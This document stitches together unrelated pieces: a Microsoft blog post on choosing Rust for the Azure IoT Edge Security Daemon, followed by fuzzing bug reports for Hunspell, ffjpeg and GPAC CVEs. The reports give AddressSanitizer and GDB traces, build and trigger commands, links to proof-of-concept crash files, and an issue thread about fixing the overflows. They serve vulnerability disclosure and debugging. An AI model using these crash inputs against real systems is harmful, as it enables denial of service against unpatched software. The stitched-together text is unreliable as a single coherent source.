Azure IoT Edge is an open source, cross platform software project from the Azure IoT team at Microsoft that seeks to solve the problem of managing distribution of compute to the edge of your on-premise network from the cloud. This post explains some of the rationale behind our choice of Rust as the implementation programming language for the Security Daemon component in the product.

Azure IoT Edge is an open source, cross platform software project from the Azure IoT team at Microsoft that seeks to solve the problem of managing distribution of compute to the _edge_ of your on-premise network from the cloud. This post explains some of the rationale behind our choice of Rust as the implementation programming language for the _Security Daemon_ component in the product.

The Security Daemon bootstraps the Azure IoT Edge runtime. It acts as a communication broker between the Azure IoT Edge runtime and many host services such as the container runtime and hardware-based cryptography devices Hardware Security Modules (HSM) and Trusted Platform Modules (TPM).

**Picking a tech stack for the Security Daemon Picking a tech stack for the Security Daemon**

When we started work on the Security Daemon (internally referred to as the _edgelet_) we identified the following broad design goals:

*   The edgelet needs to be a native component that does not require a runtime such as the .NET CLR to execute.
*   Since the edgelet will serve as the channel for accessing the HSM/TPM hardware on the device, it needs to be secure.
*   The edgelet will communicate with HSM/TPM hardware via a C Application Binary Interface (ABI), so loading shared objects/DLLs and calling C functions should be straightforward.

These design goals meant that we would have to pick a programming language such as C or C++ or Rust that compiled to native code. Not wanting to incur the runtime overhead of a garbage collector meant that Go wasn’t a desirable option. The security-related requirements of the daemon meant that we wanted to avoid having to deal with memory and concurrency bugs. As it turned out, Rust perfectly fit the bill for us given these constraints. This earlier post on this blog captures many of the benefits that we came up with when determining Rust was the programming language of choice.

**What worked well What worked well**

Before we shipped Azure IoT Edge for general availability, we engaged an external security vendor to perform penetration testing on the software. The fact that they discovered zero security issues with the Rust part of the codebase was to us a vindication of our choice of Rust. Right from the start we decided that we would have the compiler treat all warnings as errors including lints checked for by clippy. Our continuous integration system would reject pull requests that did not pass a rustfmt run which made sure that we had consistent code formatting throughout the codebase.

The Rust compiler update process and the cargo tooling has worked well for Azure IoT Edge. Upgrading to a new compiler version is almost always a painless exercise.

**Rust adoption Rust adoption**

The next step was to ramp up on the language. Compared with other popular programming languages, Rust has a rather steep learning curve and we were apprehensive about the impact this ramp up would have on project timelines. Our team already had developers well versed in C, C++, C# and Java. Luckily for us, we also had a couple of developers who were very passionate about Rust! We came up with hands-on Rust workshops where we walked the team through the parts of the language that in our experience have been somewhat hard to gain an intuition for. This time investment proved to be quite useful. We discovered that learning the language in the end proved to not be as much of a problem as we had imagined.

In a matter of 4-6 weeks, we found that nearly every single member in the team had made non-trivial contributions to the Rust part of the codebase.

**Challenges Challenges**

While our experience with shipping some of the first production Rust code by Microsoft has been delightful overall, we had a few challenges:

*   The Rust ecosystem is still relatively new compared with some of the other more established languages. This meant that we’d often have to build pieces of infrastructure that we would otherwise probably not have had to.
*   Parsing compiler error messages would occasionally prove to be difficult especially when dealing with code that made heavy use of combinators from Tokio Futures or std::iter::Iterator.
*   Teams that are used to stellar tooling support for editing and debugging C# and Java code found the Rust editing/debugging experience somewhat subpar. The VS Code Rust RLS extension was notoriously unstable in practice.
*   Reasoning about complex types that invariably get built when building complex Tokio Future combinator chains was sometimes tricky.

**What’s next What’s next**

At this point it would be fair to state that Azure IoT is completely on-board with the Rust programming language. Usage of Rust has only expanded even more since we shipped Azure IoT Edge. Multiple cloud service projects that are currently being actively worked upon are being written in Rust. The trifecta of memory safety, data race safety and performance that Rust offers has been a great fit for Azure IoT. We hope to have more to say about this in the future!

_Raj Vengalil, Principal SWE Manager, IoT Platform_

Building the Azure IoT Edge Security Daemon in Rust

Hunspell 1.7.0 has an invalid read operation in SuggestMgr::leftcommonsubstring in suggestmgr.cxx.

libfuzz fuzz hunspell-1.7.0 source code find a crash by libfuzzer , the crash was caused by a invalid READ memory access.

    ==70237==ERROR: AddressSanitizer: SEGV on unknown address 0xfffffffffffffffe (pc 0x000000548e7c bp 0x7ffc24a458e0 sp 0x7ffc24a458b0 T0)
    ==70237==The signal is caused by a READ memory access.
        #0 0x548e7b in std::vector<w_char, std::allocator<w_char> >::operator[](unsigned long) const /usr/bin/../lib/gcc/x86_64-linux-gnu/5.4.0/../../../../include/c++/5.4.0/bits/stl_vector.h:795:41
        #1 0x548e7b in SuggestMgr::leftcommonsubstring(std::vector<w_char, std::allocator<w_char> > const&, std::vector<w_char, std::allocator<w_char> > const&) /home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/src/hunspell/./suggestmgr.cxx:2043
        #2 0x5448be in SuggestMgr::ngsuggest(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, char const*, std::vector<HashMgr*, std::allocator<HashMgr*> > const&, int) /home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/src/hunspell/./suggestmgr.cxx:1194:26
        #3 0x5353f1 in HunspellImpl::suggest_internal(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool&, unsigned long&, int&) /home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/src/hunspell/./hunspell.cxx:1194:16
        #4 0x5339ee in HunspellImpl::suggest(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/src/hunspell/./hunspell.cxx:899:35
        #5 0x53bf10 in Hunspell::suggest(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/src/hunspell/./hunspell.cxx:2042:18
        #6 0x52b80b in LLVMFuzzerTestOneInput /home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/tests/fuzzer1.cxx:82:19
        #7 0x42fe2a in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/tests/crash_test+0x42fe2a)
        #8 0x41ffae in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/tests/crash_test+0x41ffae)
        #9 0x4258a1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/tests/crash_test+0x4258a1)
        #10 0x44e372 in main (/home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/tests/crash_test+0x44e372)
        #11 0x7fe57050582f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
        #12 0x41e8a8 in _start (/home/butterfly/Desktop/hunspell-1.7.0/hunspell-1.7.0/tests/crash_test+0x41e8a8)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /usr/bin/../lib/gcc/x86_64-linux-gnu/5.4.0/../../../../include/c++/5.4.0/bits/stl_vector.h:795:41 in std::vector<w_char, std::allocator<w_char> >::operator[](unsigned long) const
    ==70237==ABORTING

CVE-2019-16707: GitHub - butterflyhack/hunspell-crash: find a crash by libfuzzer

ffjpeg before 2019-08-21 has a heap-based buffer overflow in jfif_load() at jfif.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Marsman1996 opened this issue

Aug 18, 2019

· 10 comments

**Comments**

**Test Environment**

Ubuntu 14.04, 64bit, ffjpeg(master 627c8a9)

**How to trigger**

1.  compile ffjpeg with cmake file from CMake Support && FPE on unknown address #6
2.  $ ./ffjpeg -d $POC

**POC file**

https://github.com/Marsman1996/pocs/blob/master/ffjpeg/poc22-jfif\_load-heapoverflow

**Details****Asan report**

    =================================================================
    ==17308== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60340000fef8 at pc 0x402fec bp 0x7ffc051db980 sp 0x7ffc051db978
    WRITE of size 4 at 0x60340000fef8 thread T0
        #0 0x402feb in jfif_load /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:187
        #1 0x401a59 in main /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
        #2 0x7f5291e9bf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
        #3 0x401858 in _start (/home/aota10/MARS_fuzzcompare/test/ffjpeg/bin_asan/bin/ffjpeg+0x401858)
    0x60340000fef8 is located 0 bytes to the right of 504-byte region [0x60340000fd00,0x60340000fef8)
    allocated by thread T0 here:
        #0 0x7f52922584e5 (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x154e5)
        #1 0x40293b in jfif_load /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:154
        #2 0x401a59 in main /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
        #3 0x7f5291e9bf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:187 jfif_load
    Shadow bytes around the buggy address:
      0x0c06ffff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c06ffff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c06ffff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c06ffff9fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
      0x0c06ffff9fe0:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:     fa
      Heap righ redzone:     fb
      Freed Heap region:     fd
      Stack left redzone:    f1
      Stack mid redzone:     f2
      Stack right redzone:   f3
      Stack partial redzone: f4
      Stack after return:    f5
      Stack use after scope: f8
      Global redzone:        f9
      Global init order:     f6
      Poisoned by user:      f7
      ASan internal:         fe
    ==17308== ABORTING
    

**GDB report**

    Starting program: /home/aota10/MARS_fuzzcompare/test/ffjpeg/build_normal/ffjpeg -d poc22-jfif_load-heapoverflow 
    file eof !
    *** Error in `/home/aota10/MARS_fuzzcompare/test/ffjpeg/build_normal/ffjpeg': munmap_chunk(): invalid pointer: 0x000000000060a210 ***
    
    Program received signal SIGABRT, Aborted.
    0x00007ffff7a47c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    (gdb) bt
    #0  0x00007ffff7a47c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    #1  0x00007ffff7a4b028 in __GI_abort () at abort.c:89
    #2  0x00007ffff7a842a4 in __libc_message (do_abort=do_abort@entry=1, 
        fmt=fmt@entry=0x7ffff7b96350 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
    #3  0x00007ffff7a8f007 in malloc_printerr (action=<optimized out>, 
        str=0x7ffff7b966d0 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:4998
    #4  0x0000000000402416 in jfif_load (file=0x7fffffffe58c "poc22-jfif_load-heapoverflow")
        at /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:257
    #5  0x000000000040165b in main (argc=3, argv=0x7fffffffe298)
        at /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
    (gdb) 
    

rockcarry added a commit that referenced this issue

Aug 19, 2019

i make a new commit

commit b3039ae

which fix issue #10 #11 and #12

can you test again ?

This was referenced

Aug 19, 2019

Copy link

Contributor Author

Hi, I tested it with commit b3039ae

but there still exists some buffer overflows in jfif.c:195; jfif.c:216, jfif.c:228 and jfif.c:231

here are the POCs and asan log  
asan.log  
ffjpeg\_poc.zip

rockcarry added a commit that referenced this issue

Aug 19, 2019

Copy link

Contributor Author

Hi,

I tested it with commit 6bc54ed

and AddressSanitizer still reports heap-buffer-overflow in jfif.c:216 and jfif.c:231, which is caused by  
id:000026 & id:000029 in the ffjpeg\_poc.zip above.

to use AddressSanitizer you can compile program with cmd

    $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g"  cmake .
    $ make
    

Cheers

are the test case 16 & 25 pass your testing ?  
and the case 26 & 29 still failed ?

I don't have the test enviroment, can you tell me how to install the AddressSanitizer?

Copy link

Contributor Author

Hi,

> are the test case 16 & 25 pass your testing ?  
> and the case 26 & 29 still failed ?

Yes, 26 & 29 still fail while 16 & 25 pass.

> I don't have the test enviroment, can you tell me how to install the AddressSanitizer?

AddressSanitizer is part of gcc since gcc-4.8, not sure whether it can be installed separately. Here (ASANwiki) is the guide to build the ASAN from source, though I think use ASAN in gcc cost less effort

Cheers

rockcarry added a commit that referenced this issue

Aug 21, 2019

rockcarry added a commit that referenced this issue

Aug 21, 2019

Copy link

Contributor Author

Hi,

I tested commit 2ad299a and ASAN reports heap buffer overflow in

for (i\=1; i<1+16; i++) len += dht\[i\];

Maybe it should be changed to

for (i\=1; i<1+16 && dht+i<end; i++) len += dht\[i\];

This would fix the overflow problem but I'm not sure if this logic is right.

Best wishes

rockcarry added a commit that referenced this issue

Aug 21, 2019

pls test commit 58b6f94  
i think it‘s ok now.

Copy link

Contributor Author

Hi,

I tested commit 58b6f94. Since no more ASAN reports, I think this series of heap-overflow problems are fixed now.

Cheers!

2 participants

CVE-2019-16352: AddressSanitizer: heap-buffer-overflow in jfif_load() at jfif.c:187 · Issue #12 · rockcarry/ffjpeg

audio_sample_entry_AddBox() at isomedia/box_code_base.c in GPAC 0.7.1 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via a crafted file.

Tested in Ubuntu 18.04, 64bit, gcc 7.3.0, gpac (master 94ad872)

Compile cmd:  
$ ./configure --extra-cflags="-fsanitize=address,undefined -g" --extra-ldflags="-fsanitize=address,undefined -ldl -g"  
$ make

Triggered by  
$ MP4Box -diso $POC

POC file:  
https://github.com/Marsman1996/pocs/blob/master/gpac/poc14-heapoverflow

ASAN info:

    ==71438==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000591 at pc 0x7ffa85321aff bp 0x7ffc13f5e4b0 sp 0x7ffc13f5e4a0
    READ of size 1 at 0x603000000591 thread T0
        #0 0x7ffa85321afe in audio_sample_entry_AddBox /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3934
        #1 0x7ffa853f002c in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1327
        #2 0x7ffa8533c83b in audio_sample_entry_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3999
        #3 0x7ffa853ef142 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #4 0x7ffa853ef142 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #5 0x7ffa853efec3 in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
        #6 0x7ffa85329db7 in unkn_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:762
        #7 0x7ffa853ef142 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #8 0x7ffa853ef142 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #9 0x7ffa853efec3 in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
        #10 0x7ffa853ef142 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #11 0x7ffa853ef142 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #12 0x7ffa853efec3 in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
        #13 0x7ffa8533a0fc in minf_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3513
        #14 0x7ffa853ef142 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #15 0x7ffa853ef142 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #16 0x7ffa853efec3 in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
        #17 0x7ffa853367f3 in mdia_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3034
        #18 0x7ffa853ef142 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #19 0x7ffa853ef142 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #20 0x7ffa853efec3 in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
        #21 0x7ffa85354187 in trak_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:6905
        #22 0x7ffa853ef142 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #23 0x7ffa853ef142 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #24 0x7ffa853efec3 in gf_isom_box_array_read_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
        #25 0x7ffa85329db7 in unkn_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:762
        #26 0x7ffa853f1363 in gf_isom_box_read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
        #27 0x7ffa853f1363 in gf_isom_box_parse_ex /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
        #28 0x7ffa853f20c5 in gf_isom_parse_root_box /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:42
        #29 0x7ffa8541e398 in gf_isom_parse_movie_boxes /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/isom_intern.c:206
        #30 0x7ffa854237a4 in gf_isom_open_file /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/isom_intern.c:615
        #31 0x55e7b46eb046 in mp4boxMain /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/applications/mp4box/main.c:4539
        #32 0x7ffa822c6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #33 0x55e7b46ca199 in _start (/home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/build_asan/bin/gcc/MP4Box+0xac199)
    
    0x603000000591 is located 0 bytes to the right of 17-byte region [0x603000000580,0x603000000591)
    allocated by thread T0 here:
        #0 0x7ffa887fcb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
        #1 0x7ffa85329a80 in unkn_Read /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:742
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3934 in audio_sample_entry_AddBox
    Shadow bytes around the buggy address:
      0x0c067fff8060: fa fa 00 00 02 fa fa fa 00 00 05 fa fa fa 00 00
      0x0c067fff8070: 04 fa fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa
      0x0c067fff8080: 00 00 01 fa fa fa 00 00 02 fa fa fa 00 00 00 01
      0x0c067fff8090: fa fa 00 00 05 fa fa fa 00 00 04 fa fa fa 00 00
      0x0c067fff80a0: 02 fa fa fa 00 00 04 fa fa fa 00 00 00 00 fa fa
    =>0x0c067fff80b0: 00 00[01]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c067fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==71438==ABORTING
    

GDB info:

    malloc_consolidate(): invalid chunk size
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
    51	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    (gdb) bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
    #1  0x00007ffff7350801 in __GI_abort () at abort.c:79
    #2  0x00007ffff7399897 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff74c6b9a "%s\n") at ../sysdeps/posix/libc_fatal.c:181
    #3  0x00007ffff73a090a in malloc_printerr (str=str@entry=0x7ffff74c83f0 "malloc_consolidate(): invalid chunk size") at malloc.c:5350
    #4  0x00007ffff73a0bae in malloc_consolidate (av=av@entry=0x7ffff76fbc40 <main_arena>) at malloc.c:4441
    #5  0x00007ffff73a47d8 in _int_malloc (av=av@entry=0x7ffff76fbc40 <main_arena>, bytes=bytes@entry=4096) at malloc.c:3703
    #6  0x00007ffff73a70fc in __GI___libc_malloc (bytes=4096) at malloc.c:3057
    #7  0x00007ffff738e18c in __GI__IO_file_doallocate (fp=0x5555557a6260) at filedoalloc.c:101
    #8  0x00007ffff739e379 in __GI__IO_doallocbuf (fp=fp@entry=0x5555557a6260) at genops.c:365
    #9  0x00007ffff739ad23 in _IO_new_file_seekoff (fp=0x5555557a6260, offset=0, dir=2, mode=<optimized out>) at fileops.c:960
    #10 0x00007ffff7398dd9 in fseeko (fp=fp@entry=0x5555557a6260, offset=offset@entry=0, whence=whence@entry=2) at fseeko.c:36
    #11 0x00007ffff77527c9 in gf_fseek (fp=fp@entry=0x5555557a6260, offset=offset@entry=0, whence=whence@entry=2)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/utils/os_file.c:756
    #12 0x00007ffff7753323 in gf_bs_from_file (f=0x5555557a6260, mode=mode@entry=0) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/utils/bitstream.c:179
    #13 0x00007ffff7894173 in gf_isom_fdm_new (sPath=<optimized out>, mode=<optimized out>) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/data_map.c:453
    #14 0x00007ffff7894400 in gf_isom_datamap_new (location=<optimized out>, location@entry=0x7fffffffe197 "../../poc14-heapoverflow", parentPath=parentPath@entry=0x0, 
        mode=mode@entry=1 '\001', outDataMap=outDataMap@entry=0x5555557a68b0) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/data_map.c:185
    #15 0x00007ffff789cf66 in gf_isom_open_progressive (fileName=<optimized out>, start_range=0, end_range=0, the_file=0x5555557a5738 <file>, BytesMissing=0x7fffffff9390)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/isom_read.c:367
    #16 0x000055555556f48b in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/applications/mp4box/main.c:4542
    #17 0x00007ffff7331b97 in __libc_start_main (main=0x555555561e30 <main>, argc=3, argv=0x7fffffffdd98, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, 
        stack_end=0x7fffffffdd88) at ../csu/libc-start.c:310
    #18 0x0000555555561e6a in _start ()

CVE-2018-21016: AddressSanitizer: heap-buffer-overflow in audio_sample_entry_AddBox() at box_code_base.c:3934 · Issue #1180 · gpac/gpac

AVC_DuplicateConfig() at isomedia/avc_ext.c in GPAC 0.7.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted file. There is "cfg_new->AVCLevelIndication = cfg->AVCLevelIndication;" but cfg could be NULL.

Tested in Ubuntu 18.04, 64bit, gcc 7.3.0, gpac (master 94ad872)

Compile cmd  
$ ./configure --extra-cflags=-g"  
$ make

Triggered by  
$ MP4Box -diso $POC

POC file:  
https://github.com/Marsman1996/pocs/blob/master/gpac/poc12-SEGV

gdb info:

    Program received signal SIGSEGV, Segmentation fault.
    AVC_DuplicateConfig (cfg=0x0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/avc_ext.c:847
    847		cfg_new->AVCLevelIndication = cfg->AVCLevelIndication;
    (gdb) bt
    #0  AVC_DuplicateConfig (cfg=0x0) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/avc_ext.c:847
    #1  0x00007ffff7856a5f in merge_avc_config (dst_cfg=dst_cfg@entry=0x5555557a8e00, src_cfg=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/avc_ext.c:897
    #2  0x00007ffff7859ae9 in AVC_RewriteESDescriptorEx (avc=avc@entry=0x5555557a8850, mdia=mdia@entry=0x0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/avc_ext.c:1039
    #3  0x00007ffff785a037 in AVC_RewriteESDescriptor (avc=avc@entry=0x5555557a8850)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/avc_ext.c:1067
    #4  0x00007ffff786bd1c in video_sample_entry_Read (s=0x5555557a8850, bs=0x5555557a7f70)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:4291
    #5  0x00007ffff7891fa7 in gf_isom_box_read (bs=0x5555557a7f70, a=0x5555557a8850)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #6  gf_isom_box_parse_ex (outBox=0x7fffffff8af8, bs=0x5555557a7f70, parent_type=<optimized out>, is_root_box=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
    #7  0x00007ffff789254d in gf_isom_box_array_read_ex (parent=0x5555557a8800, bs=0x5555557a7f70, add_box=0x7ffff7865140 <stsd_AddBox>, 
        parent_type=1937011556) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
    #8  0x00007ffff7891fa7 in gf_isom_box_read (bs=0x5555557a7f70, a=0x5555557a8800)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #9  gf_isom_box_parse_ex (outBox=0x7fffffff8bf8, bs=0x5555557a7f70, parent_type=<optimized out>, is_root_box=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
    #10 0x00007ffff789254d in gf_isom_box_array_read_ex (parent=parent@entry=0x5555557a8730, bs=0x5555557a7f70, 
        add_box=add_box@entry=0x7ffff7863750 <stbl_AddBox>, parent_type=parent_type@entry=0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
    #11 0x00007ffff7892837 in gf_isom_box_array_read (parent=parent@entry=0x5555557a8730, bs=<optimized out>, 
        add_box=add_box@entry=0x7ffff7863750 <stbl_AddBox>) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:262
    #12 0x00007ffff786d255 in stbl_Read (s=0x5555557a8730, bs=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:5183
    #13 0x00007ffff7891fa7 in gf_isom_box_read (bs=0x5555557a7f70, a=0x5555557a8730)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #14 gf_isom_box_parse_ex (outBox=0x7fffffff8d18, bs=0x5555557a7f70, parent_type=<optimized out>, is_root_box=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
